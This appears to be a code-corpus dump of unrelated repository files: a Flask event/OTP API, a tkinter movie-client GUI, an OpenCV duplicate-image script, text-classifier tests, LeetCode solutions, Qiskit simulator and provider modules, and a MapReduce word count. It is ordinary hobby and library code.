return make_response(payLoad, 201) # Object of type Response is not JSON serializable
return make_response(payLoad, 400)
# Holded Events View
@general_bp.route('/event/holded', methods=['POST'])
def view_holded():
"""
Shows all holded events from here start event can be clicked
and then otp is passed dynamically to the start event
"""
token = request.headers.get('Authorization')
communityId_ = request.json.get('communityId') # Has to be passed
if find_missing(token, communityId_):
payLoad = {
'message': 'missing-params'
}
elif malformed_length(
{
token: [16, 1024], # 22 exactly
}
):
payLoad = {
'message': 'bad-length-params'
}
elif decode_auth_token(token) in ['Signature expired. Please log in again.', 'Invalid token. Please log in again.']:
payLoad = {
'message': 'fresh-login-required'
}
elif isBlackListed(token):
payLoad = {
'message': 'login-required'
}
else:
userId = decode_auth_token(token)
userEmail_ = Users.query.get(userId).userEmail
holdedEvents = HoldedEvents.query.filter(HoldedEvents.userEmail==userEmail_, HoldedEvents.communityId == communityId_).all()
holdedEventsArray = []
for event in holdedEvents:
adder = {
"holdId": event.holdId,
"CreationDate": event.creation_date, #--todo-- improve the format
"OTP":event.otp,
"EventName": event.event_name,
"EventDescription": event.event_description,
"LocationValidInMeters": event.location_range,
"EndingInMin": event.ending_time_delta,
"BroadcastChoice": event.broadcast_choice,
"CommunityId": event.communityId
}
holdedEventsArray.append(adder)
payLoad = holdedEventsArray
return make_response(jsonify(payLoad), 200)
return make_response(jsonify(payLoad), 400)
# Holded Event
@general_bp.route('/event/start/<otpNumber>', methods=['POST'])
def start_event(otpNumber):
"""
This will start the event those are present in holded events
Post Req: latitude, longitude, authToken
"""
token = request.headers.get('Authorization')
latitude_ = request.json.get('latitude')
longitude_ = request.json.get('longitude')
holdedQuery = HoldedEvents.query.filter_by(otp=otpNumber).first()
otp_check = holdedQuery
if otp_check in [None, '']: #does not exsists
payLoad = {
'Status': 'Fail',
'Reason': 'no-such-holded-event'
}
elif find_missing(token, latitude_, longitude_,):
payLoad = {
'message': 'missing-params',
'header': ['Authorization', ],
'body': ['latitude', 'longitude']
}
elif malformed_length(
{
token: [16, 1024],
}
):
payLoad = {
'message': 'bad-length-params'
}
elif malformed_dtc(
{
latitude_: 'f',
longitude_: 'f'
}
):
payLoad = {
'message': 'bad-datatype'
}
elif decode_auth_token(token) in ['Signature expired. Please log in again.', 'Invalid token. Please log in again.']:
payLoad = {
'message': 'fresh-login-required'
}
elif isBlackListed(token):
payLoad = {
'message': 'login-required'
}
else:
latitude_ = float(latitude_)
longitude_ = float(longitude_)
communityId_ = holdedQuery.communityId
# check if user has that community registered under him/her and is Authorized
userId = decode_auth_token(token)
userEmail_ = Users.query.get(userId).userEmail
communityRegistered = [x.communityId for x in Communities.query.filter_by(userId=userId).all()]
if communityId_ not in communityRegistered:
payLoad = {
'message': 'You-Are-Not-Registered-as-Community-Head-for-this-company'
}
return make_response(jsonify(payLoad), 403)
creation_date_ = otp_check.creation_date
userEmail_ = otp_check.userEmail
otp_ = otpNumber
event_name_ = otp_check.event_name
event_description_ = otp_check.event_description
ending_time_delta_ = otp_check.ending_time_delta
location_range_ = otp_check.location_range
broadcast_choice_ = otp_check.broadcast_choice
communityId_ = otp_check.communityId
new_event = Events(creation_date= creation_date_, userEmail=userEmail_, \
otp=otp_, event_name=event_name_, event_description=event_description_, \
ending_time_delta=ending_time_delta_, location_range=location_range_, \
latitude=latitude_, longitude=longitude_, broadcast_choice=broadcast_choice_, \
communityId=communityId_)
db.session.add(new_event)
HoldedEvents.query.filter_by(otp=otpNumber).delete()
db.session.commit()
payLoad = {
'OTP': otp_,
'EventName': event_name_,
'EndingInMin': ending_time_delta_,
'CommunityId': communityId_,
'EventStarted': True,
'BroadcastChoice': broadcast_choice_,
'LocationValidInMeters': location_range_
}
return make_response(payLoad, 200)
return make_response(payLoad, 400)
``` |
{
"source": "1UC1F3R616/D-Netflix",
"score": 3
} |
#### File: D-Netflix/D-Netflix_GUI/client_file_gui.py
```python
import webbrowser
import os
import time
import list_extractor as liex
from collections import Counter
import d_netflix_gui
from tkinter import *
import tkinter.ttk
from PIL import ImageTk, Image
import tkinter.messagebox
def on_entry_click1(event):
"""function that gets called whenever entry is clicked"""
if e1.get() == 'Username...':
e1.delete(0, "end") # delete all the text in the entry
e1.insert(0, '') #Insert blank for user input
e1.config(fg = 'black')
def on_focusout1(event):
if e1.get() == '':
e1.insert(0, 'Username...')
e1.config(fg = 'grey')
def on_entry_click2(event):
"""function that gets called whenever entry is clicked"""
if e2.get() == 'Password...':
e2.delete(0, "end") # delete all the text in the entry
e2.insert(0, '') #Insert blank for user input
e2.config(fg = 'black')
def on_focusout2(event):
if e2.get() == '':
e2.insert(0, 'Password...')
e2.config(fg = 'grey')
def choice():
def stats(self):
def thorough(self):
global client_id
global client_pass
def seen(self):
root4.destroy()
root4=Tk()
l1=Label(root4, text="Client id: "+client_id+"\t\t"+"Client Password: "+client_pass+'\<PASSWORD>'+"DateTime: "+time.ctime(), fg="blue")
l1.grid(row=0, column=0, padx=10, pady=10)
f = open("clients/"+client_id+'_'+client_pass+'.txt', "r")
ff = f.readlines()
f.close()
l2=Label(root4, text="Total "+str(len(ff))+" films have been watched so far.", fg="green yellow")
l2.grid(row=1, column=0, padx=10, pady=10)
text = [x.split('\t') for x in ff]
frequent = [x[1].replace('\n', '') for x in text]
counter = Counter(frequent).most_common(3)
l3=Label(root4, text=client_id+" favourate films:", fg="gold")
l3.grid(row=2, column=0)
count3=3
for x in counter:
l4=Label(root4, text=x[0])
l4.grid(row=count3, column=0)
count3+=1
b1=Button(root4, text="CLOSE", fg="red", bg="black")
b1.grid(row=count3, column=0)
b1.bind("<Button-1>", seen)
root4.bind("<Return>", seen)
def frequency(self):
def seen(self):
root3.destroy()
root3=Tk()
global client_id
global client_pass
file = open("clients/"+client_id+'_'+client_pass+'.txt', "r")
file_text = file.readlines()
file.close()
text = [x.split('\t') for x in file_text]
frequent = [x[1].replace('\n', '') for x in text]
l1=Label(root3, text="Frequency\t Film:::")
l1.grid(row=0, column=0)
count2=1
for x in Counter(frequent):
l2=Label(root3, text=str(Counter(frequent)[x])+'\t\t'+x, fg="brown")
l2.grid(row=count2, column=0)
count2+=1
b1=Button(root3, text="CLOSE", fg="red", bg="black")
b1.bind("<Button-1>", seen)
b1.grid(row=count2, column=0, columnspan=2)
root3.bind("<Return>", seen)
root2=Tk()
root2.title("^_^FILM STATS^_^")
root2.geometry("400x60")
b1=Button(root2, text="WATCH FREQUENCY", fg="green", bg="CadetBlue1")
b1.pack(fill=BOTH)
b1.bind("<Button-1>", frequency)
b2=Button(root2, text="THOROUGH STATS", fg="green", bg="CadetBlue1")
b2.pack(fill=BOTH)
b2.bind("<Button-1>", thorough)
def history(self):
global client_id
global client_pass
def seen(self):
root2.destroy()
file = open("clients/"+client_id+'_'+client_pass+'.txt', "r")
file_text = file.readlines()
file.close()
file_text.reverse()
root2=Tk()
root2.title("HISTORY")
l1=Label(root2, text="DateTime \tFilm:::")
l1.grid(row=0, column=0)
count=1
for line in file_text:
l2=Label(root2, text=line, fg="brown")
l2.grid(row=count, column=0)
count+=1
b1 = Button(root2, text="CLOSE", fg="red", bg="black", relief="groove")
b1.grid(row=count, column=0, columnspan=2)
b1.bind("<Button-1>", seen)
root2.bind("<Return>", seen)
def watch(self):
def see(self):
global client_id
global client_pass
title=e1.get()
root2.geometry("450x250")
file = open('dsap_92det.txt', "r")
file_text = file.readlines()
file.close()
file_r_text = liex.cleaner(file_text)
for line in file_r_text:
if line[1]==title:
file = open("clients/"+client_id+'_'+client_pass+'.txt', "a+")
file.write(time.ctime()+'\t '+title+'\n')
collect = open("collective.txt", "a+")
collect.write(time.ctime()+'\t '+title+'\n')
collect.close()
file.close()
webbrowser.open(line[0])
root2.destroy()
break
else:
tkinter.messagebox.showinfo("Film Not Present", title+" is not present")
root2.destroy()
watch(self)
root2 = Tk()
root.title("FILM TIME")
l1 = Label(root2, text="TITLE", padx=10, pady=10)
l1.grid(row=0, column=0)
e1 = Entry(root2, width=20)
e1.grid(row=0, column=1, columnspan=2)
e1.focus_set()
b1 = Button(root2, text="Lit", fg="red", bd=1, padx=10, pady=10)
b1.grid(row=1, column=0, rowspan=2, columnspan=2)
b1.bind("<Button-1>", see)
root2.bind("<Return>", see)
root=Tk()
root.title("CLIENT MAIN-MENU")
def seen(self):
root.destroy()
d_netflix_gui.greet()
img = ImageTk.PhotoImage(Image.open("watch1.png"))
#b1 = Button(root, text="WATCH", bg="dark violet", fg="snow", cursor="mouse", relief="raised", command=watch)
b1 = Button(root, image=img, cursor="mouse", relief="raised", padx=10, pady=20)
b1.bind("<Button-1>", watch)
b1.image=img
b1.grid(row=0, column=0)
#b2 = Button(root, text="HISTORY", bg="dark violet", fg="snow", cursor="mouse", relief="raised")
img = ImageTk.PhotoImage(Image.open("history1.png"))
b2 = Button(root, image=img, cursor="mouse", relief="raised", padx=10, pady=20)
b2.bind("<Button-1>", history)
b2.image=img
b2.grid(row=1, column=0)
#b3 = Button(root, text="STATS", bg="dark violet", fg="snow", cursor="mouse", relief="raised")
img = ImageTk.PhotoImage(Image.open("stats1.png"))
b3 = Button(root, image=img, cursor="mouse", relief="raised", padx=10, pady=20)
b3.bind("<Button-1>", stats)
b3.image=img
b3.grid(row=2, column=0)
img = ImageTk.PhotoImage(Image.open("exit1.png"))
#b4 = Button(root, text="EXIT CLIENT", bg="dark violet", fg="snow", cursor="mouse", relief="raised", command=turn_back)
b4 = Button(root, image=img, cursor="mouse", relief="raised", padx=10, pady=20)
b4.bind("<Button-1>", seen)
b4.image=img
b4.grid(row=3, column=0)
def login():
root = Tk()
root.title("Client Login")
l1 = Label(root, text="NAME", fg="goldenrod", font ="Purisa")
l1.grid(row=0, stick=W)
l2 = Label(root, text="PASS", fg="goldenrod", font ="Purisa")
l2.grid(row=1, stick=W, columnspan=1)
global e1
global e2
e1 = Entry(root)
e1.insert(0, 'Username...')
e1.bind('<FocusIn>', on_entry_click1)
e1.bind('<FocusOut>', on_focusout1)
e1.config(fg = 'grey')
e1.grid(row=0, column=1)
e1.focus_set()
e2 = Entry(root)
e2.insert(0, 'Password...')
e2.bind('<FocusIn>', on_entry_click2)
e2.bind('<FocusOut>', on_focusout2)
e2.config(fg = 'grey')
e2.grid(row=1, column=1)
e2.focus_set()
def login2(self):
global client_id
global client_pass
client_id = e1.get()
client_pass = e2.get()
flag = 1
for file in os.listdir("clients"):
if file == client_id+'_'+client_pass+'.txt':
l3=Label(root, text="Welcome "+client_id, fg="cyan", font ="Purisa")
l3.grid(row=3)
flag=0
root.destroy()
choice()
if flag:
l4=Label(root, text="Invalid credentials!", fg="gray1", font ="Purisa")
l4.grid(row=3)
b1 = Button(root, text="LOGIN", bg="RoyalBlue1", fg="red", cursor="man", relief="groove")
b1.bind('<Button-1>', login2)
root.bind('<Return>', login2)
b1.grid(columnspan=2)
logo=Label(root, text="DN", font=("Symbol", 20), fg="red4", borderwidth=5, relief="groove")
logo.grid(row=0, column=2, rowspan=2, columnspan=2, ipadx=5, ipady=5, padx=13, pady=13)
root.mainloop()
def start():
login()
if __name__ == "__main__":
start()
```
#### File: D-NETFLIX__review_3/D-Netflix_CLI/start_file.py
```python
import server_file
import client_file
def greet():
print("Hi! This is D-Netflix, A simple application based on Stack and queue.")
print("New user may refer to User_guide firstly.\n\n")
def side():
print("Are you a Client or Server?")
print("Press 'C' or 'c' for client and hit enter.")
print("Press 'S' or 's' for server and hit enter.")
side_var = input()
print()
if side_var in ('S', 's'):
server_file.start()
# Server will be started
elif side_var in ('C', 'c'):
client_file.start()
# Client will be started
else:
print("Invalid choice\n")
side()
``` |
{
"source": "1UC1F3R616/Duplicate-Images-Detection-using-Parallel-Processing",
"score": 3
} |
#### File: Duplicate-Images-Detection-using-Parallel-Processing/Data Generating Scripts/single_core_data_gen.py
```python
import cv2
import numpy as np
import glob
import time
import multiprocessing
import threading
"""
Sequentiall on single core
"""
def filebrowser(ext='', directory=''):
"""
returns files with an extension
"""
return [f for f in glob.glob(f"{directory}**/*{ext}", recursive=True)]
image_dir = filebrowser(ext='.jpeg', directory='') # directory='' ==> search images from current to inner sub-directories
image_dir += filebrowser(ext='.jpg', directory='')
## print(image_dir)
image_name = 'c2.jpeg' # origional image path goes here
original = cv2.imread(image_name)
start_time = time.time()
time_list = ()
image_count = 1
image_count_list = ()
for image_ in image_dir:
try:
image_to_compare = cv2.imread(image_)
if original.shape == image_to_compare.shape:
difference = cv2.subtract(original, image_to_compare)
b, g, r = cv2.split(difference)
if cv2.countNonZero(b) == 0 and cv2.countNonZero(g) == 0 and cv2.countNonZero(r) == 0:
sift = cv2.xfeatures2d.SIFT_create()
kp_1, desc_1 = sift.detectAndCompute(original, None)
kp_2, desc_2 = sift.detectAndCompute(image_to_compare, None)
index_params = dict(algorithm=0, trees=5)
search_params = dict()
flann = cv2.FlannBasedMatcher(index_params, search_params)
matches = flann.knnMatch(desc_1, desc_2, k=2)
good_points = []
for m, n in matches:
if m.distance < 0.6*n.distance:
good_points.append(m)
# Define how similar they are
number_keypoints = 0
if len(kp_1) <= len(kp_2):
number_keypoints = len(kp_1)
else:
number_keypoints = len(kp_2)
time_list += (round(time.time() - start_time, 5), )
image_count_list += (image_count, )
image_count += 1
except Exception as e:
pass
print("--- %s seconds ---" % (time.time() - start_time))
print('Program Executed Completely')
print(time_list)
print(image_count_list)
``` |
{
"source": "1UC1F3R616/quicktext",
"score": 3
} |
#### File: quicktext/tests/test_text_classifier.py
```python
import unittest
import en_core_web_md
import torch
from quicktext import TextClassifier
class TextClassifierTester(unittest.TestCase):
def test_init(self):
nlp = en_core_web_md.load()
classifier = TextClassifier(nlp.vocab, n_classes=2)
self.assertTrue(isinstance(classifier, TextClassifier))
def test_predict(self):
nlp = en_core_web_md.load()
classifier = TextClassifier(nlp.vocab, n_classes=2)
text = "Sample text to test the classifier"
output = classifier.predict(text)
self.assertTrue(isinstance(output.data, torch.Tensor))
def test_get_ids(self):
nlp = en_core_web_md.load()
classifier = TextClassifier(nlp.vocab, n_classes=2)
text = "Sample text to test the classifier"
ids = classifier.get_ids(text)
self.assertTrue(isinstance(ids, list))
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "1ucas/puc-arq-big-data",
"score": 3
} |
#### File: 1ucas/puc-arq-big-data/exe1.py
```python
import mincemeat
import glob
import csv
text_files = glob.glob('C:\\Userx\\Exerc\\Textos\\*')
def file_contents(file_name):
f = open(file_name)
try:
return f.read()
finally:
f.close()
source = dict((file_name, file_contents(file_name))for file_name in text_files)
def mapfn(k, v):
print 'map ' + k
from stopwords import allStopWords
for line in v.splitlines():
for word in line.split():
if( word not in allStopWords ):
yield word, 1
def reducefn(k, v):
print 'reduce ' + k
return sum(v)
s = mincemeat.Server()
s.datasource = source
s.mapfn = mapfn
s.reducefn = reducefn
results = s.run_server(password="<PASSWORD>")
w = csv.writer(open("C:\\Userx\\Exerc\\RESULT.csv", "w"))
for k, v in results.items():
w.writerow([k, v])
``` |
{
"source": "1uci3n/leetcode",
"score": 3
} |
#### File: leetcode/#14/#14_self.py
```python
class Solution:
def longestCommonPrefix(self, strs: List[str]) -> str:
num_strs = len(strs)
min_len = len(strs[0])
if num_strs == 1:
return strs[0]
for i in range(1, num_strs):
if min_len > len(strs[i]):
min_len = len(strs[i])
prefix = ""
for i in range(min_len):
current_str = strs[0][i]
for j in range(1, num_strs):
if current_str != strs[j][i]:
return prefix
prefix += current_str
return prefix
```
#### File: leetcode/#303/#303_self.py
```python
class NumArray:
def __init__(self, nums: List[int]):
self.nums = nums
def sumRange(self, i: int, j: int) -> int:
result = 0
for m in range(i, j + 1):
result += self.nums[m]
return result
# Your NumArray object will be instantiated and called as such:
# obj = NumArray(nums)
# param_1 = obj.sumRange(i,j)
```
#### File: leetcode/#304/#304_self.py
```python
class NumMatrix:
def __init__(self, matrix: List[List[int]]):
self.matrix = matrix
self.sum_matrix = []
for i in range(len(matrix)):
temp = []
temp_sum = 0
for j in range(len(matrix[0])):
temp.append(temp_sum)
temp_sum += matrix[i][j]
self.sum_matrix.append(temp)
def sumRegion(self, row1: int, col1: int, row2: int, col2: int) -> int:
reslut = 0
for i in range(row1, row2 + 1):
reslut += self.sum_matrix[i][col2] - self.sum_matrix[i][col1] + self.matrix[i][col2]
return reslut
# Your NumMatrix object will be instantiated and called as such:
# obj = NumMatrix(matrix)
# param_1 = obj.sumRegion(row1,col1,row2,col2)
```
#### File: leetcode/#485/#485_self_2.py
```python
class Solution(object):
def findMaxConsecutiveOnes(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
max_num = 0
current_num = 0
for i in nums:
if i == 1:
current_num += 1
else:
if current_num > max_num:
max_num = current_num
current_num = 0
if current_num > max_num:
max_num = current_num
return max_num
```
#### File: leetcode/#561/#561_self.py
```python
class Solution(object):
def arrayPairSum(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
n = len(nums) / 2
# a = [nums[0]]
# for i in range(1, len(nums)):
# if nums[i] <= a[0]:
# a.insert(0, nums[i])
# continue
# for j in range(0, len(a) - 1):
# if (nums[i] > a[j]) & (nums[i] <= a[j + 1]):
# a.insert(j+1, nums[i])
# break
# if nums[i] > a[-1]:
# a.insert(len(a), nums[i])
sums = 0
a = sorted(nums)
for i in range(n):
sums += a[i * 2]
return sums
```
#### File: leetcode/#995/#995_self.py
```python
class Solution(object):
def minKBitFlips(self, A, K):
"""
:type A: List[int]
:type K: int
:rtype: int
"""
# Time out cause O(N*K)
counter = 0
for i in range(len(A) - K + 1):
if A[i] == 0:
for j in range(K):
A[i + j] = inv(A[i + j])
counter += 1
for i in range(1, K + 1):
if A[-i] == 0:
return -1
return counter
def inv(num):
if num == 0:
return 1
else:
return 0
``` |
{
"source": "1ucian0/qiskit-aer",
"score": 2
} |
#### File: aer/backends/unitary_simulator.py
```python
import logging
from math import log2, sqrt
from qiskit.util import local_hardware_info
from qiskit.providers.models import QasmBackendConfiguration
from .aerbackend import AerBackend
from ..aererror import AerError
# pylint: disable=import-error
from .controller_wrappers import unitary_controller_execute
from ..version import __version__
# Logger
logger = logging.getLogger(__name__)
class UnitarySimulator(AerBackend):
"""Ideal quantum circuit unitary simulator.
**Backend options**
The following backend options may be used with in the
``backend_options`` kwarg for :meth:`UnitarySimulator.run` or
``qiskit.execute``.
* ``"initial_unitary"`` (matrix_like): Sets a custom initial unitary
matrix for the simulation instead of identity (Default: None).
* ``"validation_threshold"`` (double): Sets the threshold for checking
if initial unitary and target unitary are unitary matrices.
(Default: 1e-8).
* ``"zero_threshold"`` (double): Sets the threshold for truncating
small values to zero in the result data (Default: 1e-10).
* ``"max_parallel_threads"`` (int): Sets the maximum number of CPU
cores used by OpenMP for parallelization. If set to 0 the
maximum will be set to the number of CPU cores (Default: 0).
* ``"max_parallel_experiments"`` (int): Sets the maximum number of
qobj experiments that may be executed in parallel up to the
max_parallel_threads value. If set to 1 parallel circuit
execution will be disabled. If set to 0 the maximum will be
automatically set to max_parallel_threads (Default: 1).
* ``"max_memory_mb"`` (int): Sets the maximum size of memory
to store a state vector. If a state vector needs more, an error
is thrown. In general, a state vector of n-qubits uses 2^n complex
values (16 Bytes). If set to 0, the maximum will be automatically
set to half the system memory size (Default: 0).
* ``"statevector_parallel_threshold"`` (int): Sets the threshold that
2 * "n_qubits" must be greater than to enable OpenMP
parallelization for matrix multiplication during execution of
an experiment. If parallel circuit or shot execution is enabled
this will only use unallocated CPU cores up to
max_parallel_threads. Note that setting this too low can reduce
performance (Default: 14).
"""
MAX_QUBIT_MEMORY = int(log2(sqrt(local_hardware_info()['memory'] * (1024 ** 3) / 16)))
DEFAULT_CONFIGURATION = {
'backend_name': 'unitary_simulator',
'backend_version': __version__,
'n_qubits': MAX_QUBIT_MEMORY,
'url': 'https://github.com/Qiskit/qiskit-aer',
'simulator': True,
'local': True,
'conditional': False,
'open_pulse': False,
'memory': False,
'max_shots': int(1e6), # Note that this backend will only ever
# perform a single shot. This value is just
# so that the default shot value for execute
# will not raise an error when trying to run
# a simulation
'description': 'A C++ unitary simulator for QASM Qobj files',
'coupling_map': None,
'basis_gates': [
'u1', 'u2', 'u3', 'cx', 'cz', 'id', 'x', 'y', 'z', 'h', 's', 'sdg',
't', 'tdg', 'swap', 'ccx', 'unitary', 'diagonal', 'cu1', 'cu2',
'cu3', 'cswap', 'mcx', 'mcy', 'mcz', 'mcu1', 'mcu2', 'mcu3',
'mcswap', 'multiplexer',
],
'gates': [{
'name': 'u1',
'parameters': ['lam'],
'conditional': True,
'description': 'Single-qubit gate [[1, 0], [0, exp(1j*lam)]]',
'qasm_def': 'gate u1(lam) q { U(0,0,lam) q; }'
}, {
'name': 'u2',
'parameters': ['phi', 'lam'],
'conditional': True,
'description':
'Single-qubit gate [[1, -exp(1j*lam)], [exp(1j*phi), exp(1j*(phi+lam))]]/sqrt(2)',
'qasm_def': 'gate u2(phi,lam) q { U(pi/2,phi,lam) q; }'
}, {
'name':
'u3',
'parameters': ['theta', 'phi', 'lam'],
'conditional':
True,
'description':
'Single-qubit gate with three rotation angles',
'qasm_def':
'gate u3(theta,phi,lam) q { U(theta,phi,lam) q; }'
}, {
'name': 'cx',
'parameters': [],
'conditional': True,
'description': 'Two-qubit Controlled-NOT gate',
'qasm_def': 'gate cx c,t { CX c,t; }'
}, {
'name': 'cz',
'parameters': [],
'conditional': True,
'description': 'Two-qubit Controlled-Z gate',
'qasm_def': 'gate cz a,b { h b; cx a,b; h b; }'
}, {
'name': 'id',
'parameters': [],
'conditional': True,
'description': 'Single-qubit identity gate',
'qasm_def': 'gate id a { U(0,0,0) a; }'
}, {
'name': 'x',
'parameters': [],
'conditional': True,
'description': 'Single-qubit Pauli-X gate',
'qasm_def': 'gate x a { U(pi,0,pi) a; }'
}, {
'name': 'y',
'parameters': [],
'conditional': True,
'description': 'Single-qubit Pauli-Y gate',
'qasm_def': 'TODO'
}, {
'name': 'z',
'parameters': [],
'conditional': True,
'description': 'Single-qubit Pauli-Z gate',
'qasm_def': 'TODO'
}, {
'name': 'h',
'parameters': [],
'conditional': True,
'description': 'Single-qubit Hadamard gate',
'qasm_def': 'TODO'
}, {
'name': 's',
'parameters': [],
'conditional': True,
'description': 'Single-qubit phase gate',
'qasm_def': 'TODO'
}, {
'name': 'sdg',
'parameters': [],
'conditional': True,
'description': 'Single-qubit adjoint phase gate',
'qasm_def': 'TODO'
}, {
'name': 't',
'parameters': [],
'conditional': True,
'description': 'Single-qubit T gate',
'qasm_def': 'TODO'
}, {
'name': 'tdg',
'parameters': [],
'conditional': True,
'description': 'Single-qubit adjoint T gate',
'qasm_def': 'TODO'
}, {
'name': 'swap',
'parameters': [],
'conditional': True,
'description': 'Two-qubit SWAP gate',
'qasm_def': 'TODO'
}, {
'name': 'ccx',
'parameters': [],
'conditional': True,
'description': 'Three-qubit Toffoli gate',
'qasm_def': 'TODO'
}, {
'name': 'cswap',
'parameters': [],
'conditional': True,
'description': 'Three-qubit Fredkin (controlled-SWAP) gate',
'qasm_def': 'TODO'
}, {
'name': 'unitary',
'parameters': ['matrix'],
'conditional': True,
'description': 'N-qubit arbitrary unitary gate. '
'The parameter is the N-qubit matrix to apply.',
'qasm_def': 'unitary(matrix) q1, q2,...'
}, {
'name': 'diagonal',
'parameters': ['diag_elements'],
'conditional': True,
'description': 'N-qubit diagonal unitary gate. The parameters are the'
' diagonal entries of the N-qubit matrix to apply.',
'qasm_def': 'TODO'
}, {
'name': 'cu1',
'parameters': ['lam'],
'conditional': True,
'description': 'Two-qubit Controlled-u1 gate',
'qasm_def': 'TODO'
}, {
'name': 'cu2',
'parameters': ['phi', 'lam'],
'conditional': True,
'description': 'Two-qubit Controlled-u2 gate',
'qasm_def': 'TODO'
}, {
'name': 'cu3',
'parameters': ['theta', 'phi', 'lam'],
'conditional': True,
'description': 'Two-qubit Controlled-u3 gate',
'qasm_def': 'TODO'
}, {
'name': 'mcx',
'parameters': [],
'conditional': True,
'description': 'N-qubit multi-controlled-X gate',
'qasm_def': 'TODO'
}, {
'name': 'mcy',
'parameters': [],
'conditional': True,
'description': 'N-qubit multi-controlled-Y gate',
'qasm_def': 'TODO'
}, {
'name': 'mcz',
'parameters': [],
'conditional': True,
'description': 'N-qubit multi-controlled-Z gate',
'qasm_def': 'TODO'
}, {
'name': 'mcu1',
'parameters': ['lam'],
'conditional': True,
'description': 'N-qubit multi-controlled-u1 gate',
'qasm_def': 'TODO'
}, {
'name': 'mcu2',
'parameters': ['phi', 'lam'],
'conditional': True,
'description': 'N-qubit multi-controlled-u2 gate',
'qasm_def': 'TODO'
}, {
'name': 'mcu3',
'parameters': ['theta', 'phi', 'lam'],
'conditional': True,
'description': 'N-qubit multi-controlled-u3 gate',
'qasm_def': 'TODO'
}, {
'name': 'mcswap',
'parameters': [],
'conditional': True,
'description': 'N-qubit multi-controlled-SWAP gate',
'qasm_def': 'TODO'
}, {
'name': 'multiplexer',
'parameters': ['mat1', 'mat2', '...'],
'conditional': True,
'description': 'N-qubit multi-plexer gate. '
'The input parameters are the gates for each value.',
'qasm_def': 'TODO'
}]
}
def __init__(self, configuration=None, provider=None):
super().__init__(unitary_controller_execute,
QasmBackendConfiguration.from_dict(self.DEFAULT_CONFIGURATION),
provider=provider)
def _validate(self, qobj, backend_options, noise_model):
"""Semantic validations of the qobj which cannot be done via schemas.
Some of these may later move to backend schemas.
1. Set shots=1
2. No measurements or reset
3. Check number of qubits will fit in local memory.
"""
name = self.name()
if noise_model is not None:
raise AerError("{} does not support noise.".format(name))
n_qubits = qobj.config.n_qubits
max_qubits = self.configuration().n_qubits
if n_qubits > max_qubits:
raise AerError(
'Number of qubits ({}) is greater than max ({}) for "{}" with {} GB system memory.'
.format(n_qubits, max_qubits, name, int(local_hardware_info()['memory'])))
if qobj.config.shots != 1:
logger.info('"%s" only supports 1 shot. Setting shots=1.',
name)
qobj.config.shots = 1
for experiment in qobj.experiments:
exp_name = experiment.header.name
if getattr(experiment.config, 'shots', 1) != 1:
logger.info('"%s" only supports 1 shot. '
'Setting shots=1 for circuit "%s".',
name, exp_name)
experiment.config.shots = 1
for operation in experiment.instructions:
if operation.name in ['measure', 'reset']:
raise AerError(
'Unsupported {} instruction {} in circuit {}'
.format(name, operation.name, exp_name))
``` |
{
"source": "1ucian0/qiskit-ibmq-provider",
"score": 3
} |
#### File: ibmq/circuits/exceptions.py
```python
from ..exceptions import IBMQError
CIRCUIT_NOT_ALLOWED = 'Circuit support is not available yet in this account'
CIRCUIT_SUBMIT_ERROR = 'Circuit could not be submitted: {}'
CIRCUIT_RESULT_ERROR = 'Circuit result could not be returned: {}'
class CircuitError(IBMQError):
"""Generic Circuit exception."""
pass
class CircuitAvailabilityError(CircuitError):
"""Error while accessing a Circuit."""
def __init__(self, message: str = ''):
super().__init__(message or CIRCUIT_NOT_ALLOWED)
class CircuitSubmitError(CircuitError):
"""Error while submitting a Circuit."""
def __init__(self, message: str):
super().__init__(CIRCUIT_SUBMIT_ERROR.format(message))
class CircuitResultError(CircuitError):
"""Error during the results of a Circuit."""
def __init__(self, message: str):
super().__init__(CIRCUIT_RESULT_ERROR.format(message))
```
#### File: ibmq/utils/utils.py
```python
import re
import keyword
def to_python_identifier(name: str) -> str:
"""Convert a name to a valid Python identifier.
Args:
name (str): Name to be converted.
Returns:
str: Name that is a valid Python identifier.
"""
# Python identifiers can only contain alphanumeric characters
# and underscores and cannot start with a digit.
pattern = re.compile(r"\W|^(?=\d)", re.ASCII)
if not name.isidentifier():
name = re.sub(pattern, '_', name)
# Convert to snake case
name = re.sub('((?<=[a-z0-9])[A-Z]|(?!^)(?<!_)[A-Z](?=[a-z]))', r'_\1', name).lower()
while keyword.iskeyword(name):
name += '_'
return name
```
#### File: test/ibmq/test_circuits.py
```python
import os
from qiskit.providers.ibmq.ibmqfactory import IBMQFactory
from qiskit.result import Result
from ..decorators import requires_qe_access
from ..ibmqtestcase import IBMQTestCase
class TestCircuits(IBMQTestCase):
"""Tests IBM Q Circuits."""
def setUp(self):
super().setUp()
if not os.getenv('CIRCUITS_TESTS'):
self.skipTest('Circut tests disable')
@requires_qe_access
def test_circuit_random_uniform(self, qe_token, qe_url):
"""Test random_uniform circuit."""
ibmq_factory = IBMQFactory()
provider = ibmq_factory.enable_account(qe_token, qe_url)
results = provider.circuits.random_uniform(number_of_qubits=4)
self.assertIsInstance(results, Result)
``` |
{
"source": "1ucian0/qiskit-terra-fuzz",
"score": 2
} |
#### File: extensions/standard/rx.py
```python
from qiskit.circuit import CompositeGate
from qiskit.circuit import Gate
from qiskit.circuit import QuantumCircuit
from qiskit.circuit import QuantumRegister
from qiskit.qasm import pi
from qiskit.extensions.standard.u3 import U3Gate
class RXGate(Gate):
"""rotation around the x-axis."""
def __init__(self, theta):
"""Create new rx single qubit gate."""
super().__init__("rx", 1, [theta])
def _define(self):
"""
gate rx(theta) a {u3(theta, -pi/2, pi/2) a;}
"""
definition = []
q = QuantumRegister(1, "q")
rule = [
(U3Gate(self.params[0], -pi/2, pi/2), [q[0]], [])
]
for inst in rule:
definition.append(inst)
self.definition = definition
def inverse(self):
"""Invert this gate.
rx(theta)^dagger = rx(-theta)
"""
return RXGate(-self.params[0])
def rx(self, theta, q):
"""Apply Rx to q."""
return self.append(RXGate(theta), [q], [])
QuantumCircuit.rx = rx
CompositeGate.rx = rx
``` |
{
"source": "1ucian0/variationaltoolkit",
"score": 2
} |
#### File: variationaltoolkit/examples/libe_opt.py
```python
from __future__ import division
from __future__ import absolute_import
from mpi4py import MPI # for libE communicator
import sys, os # for adding to path
import numpy as np
import socket
from libensemble.libE import libE
from libensemble.gen_funcs.persistent_aposmm import aposmm as gen_f
from libensemble.alloc_funcs.persistent_aposmm_alloc import persistent_aposmm_alloc as alloc_f
import numpy as np
import networkx as nx
import pickle
import argparse
from functools import partial
